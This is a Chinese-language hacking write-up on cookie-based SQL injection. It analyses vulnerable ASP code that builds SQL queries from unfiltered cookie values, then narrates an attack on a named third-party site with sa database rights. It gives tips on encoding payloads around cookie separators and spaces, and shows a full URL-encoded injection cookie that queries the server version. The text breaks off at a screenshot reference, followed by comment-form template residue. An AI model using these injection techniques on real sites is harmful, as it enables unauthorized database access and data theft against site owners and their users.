一、目标的锁定
MSN上朋友icerover发信息过来问我些关于cookie注射的问题,刚好那时读蚂蚁影院系统的代码,也正好发现了其chageusr.asp. 存在cookie注射漏洞,这里简要分析其代码:
====================code==========================
<% if request.cookies("userid")="" or request.cookies("password")="" then //首先要保证我们的cookie中userid和password的值不为空
response.write"<script>alert('没有登陆无法修改!');</Script>"
response.write"<script Language=Javascript>location.href = 'index.asp';</script>"
end if
if request.cookies("oktt")="yes" then
response.write"<script>alert('网吧用户无权进入!');</Script>"
response.write"<script Language=Javascript>location.href = 'index.asp';</script>"
end if
dim rs
dim sql
set rs=server.createobject("adodb.recordset")
sql="select * from users where userid='"amp;request.cookies("userid")amp;"' and password='"amp;request.cookies("password")amp;"'" //sql语句中可以看到userid和password的查询是来自客户端的cookie,并且没有验证
rs.open sql,conn,1,3
id=rs("id")
userid=rs("userid")
password=rs("password")
name=rs("name")
email=rs("email")
sex=rs("sex")
Province=rs("Province")
dat=rs("date")
%>
====================code==========================
通过上面的简要分析我们可以知道,userid和password并没有过滤,userid和password全来自客户端的cookie,所以我们只要在客户端中的cookie构造注射语句就可以进行注射.
怎么利用这里暂不介绍,下面会提到.
朋友告诉我,有一个站www.chinaxxx.net其member.asp存在cookie注射漏洞,其权限为sa.
二、渗透之旅
下面为其member.asp的代码:
====================code==========================
<% Response.CacheControl ="" "no-cache"
Email ="" Request.Cookies("Email")
Userid ="" Request.Cookies("Userid")
if Len(Email)="0 then Response.Redirect" "login.htm"
%> <%
if Len(Email)>3 then
set objConn = Server.CreateObject("ADODB.Connection")
objConn.Open strQ
strQ = "select * from tb_users where usertype>0 and email='" amp;Email amp; "' and Userid=" amp;Userid
set objRs = Server.CreateObject("ADODB.Recordset")
objRs.Open strQ,objConn,1,3
if not objRs.EOF then
ExpDays = DateDiff("d",now(),objRs("expdate"))
ExpDate = FormatDateTime(objRs("expdate"),2)
Username = objRs("Username")
if ExpDays <="0 then
" objRs("usertype") =" 3
ExpDays" =" 0
else
" objRs("usertype") =" 9
end if
" objRs.Update
%>
====================code==========================
通过上面的代码Userid = Request.Cookies("Userid")等等,我们可以知道其userid和email的值是来客户端的cookie,再跟踪一下会发现其cookie并没有过滤,而是
strQ = "select * from tb_users where usertype>0 and email='" &Email & "' and Userid=" &Userid
直接查询,所以这个时候我们只要在cookie里面构造正确的语句就可以搞定这个站点,sa权限可以让我们….嘿嘿
三、cookie注射注意点
1.;符号,在cookie里,各个变量间的是用;来区分的,所以你的注射语句里面不要乱含有;,如果你含有的话,可能会导致你的注射语句出错.
2.空格符号,在cookie里,会自动过滤掉空格,所以你的注射语句里面要注意转换
该注意的地方也差不多了,现在我们开始我们的注射之旅吧.
四、我注,我注,我注注注#p#分页标题#e#
其member.asp需要登陆,登陆后其cookie如下
Userid=5581;email=icerover%40msn%2Ecom; ASPSESSIONIDASARRRTT=OMOIFPICADICDLAMAKOGCNNH
变换一下位置,方便注射
email=icerover%40msn%2Ecom; ASPSESSIONIDASARRRTT=OMOIFPICADICDLAMAKOGCNNH; Userid=5581;
查一下版本:
把 and 1=(select @@version);--解码一下,转换如下:
%20%61%6E%64%20%31%3D%28%73%65%6C%65%63%74%20%40%40%76%65%72%73%69%6F%6E%29%3B%2D%2D
整个cookie变换成
email=icerover%40msn%2Ecom; ASPSESSIONIDASARRRTT=OMOIFPICADICDLAMAKOGCNNH; Userid=5581%20%61%6E%64%20%31%3D%28%73%65%6C%65%63%74%20%40%40%76%65%72%73%69%6F%6E%29%3B%2D%2D
得到回显如图一:
评论 {{userinfo.comments}}
{{child.content}}
{{question.question}}
提交